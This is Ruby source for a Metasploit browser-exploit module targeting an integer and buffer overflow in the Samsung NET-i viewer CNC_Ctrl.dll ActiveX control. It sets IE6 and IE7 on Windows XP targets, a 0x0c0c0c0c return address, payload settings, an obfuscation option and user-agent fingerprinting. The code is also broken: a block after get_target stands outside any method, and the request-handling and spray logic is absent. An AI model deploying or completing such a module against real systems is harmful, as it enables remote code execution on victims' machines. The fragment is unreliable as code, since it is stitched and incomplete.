class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",
'Description' => %q{
This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX installed
with the Samsung NET-i viewer 1.37.
Specifically, when supplying a long string for the fname parameter to the
BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer
overflow due to the use of memcpy with an incorrect size, resulting in remote code
execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '81453'],
[ 'BID', '53193'],
[ 'URL', 'http://aluigi.altervista.org/adv/netiware_1-adv.txt' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# Samsung NET-i viewer 1.37
# CNC_Ctrl.dll 1.5.1.1
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3',
{
'Ret' => 0x0c0c0c0c,
'Offset' => '0x800 - code.length',
}
],
[ 'IE 7 on Windows XP SP3',
{
'Ret' => 0x0c0c0c0c,
'Offset' => '0x800 - code.length',
}
]
],
'Privileged' => false,
'DisclosureDate' => "Apr 21 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
else
return nil
end
end
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end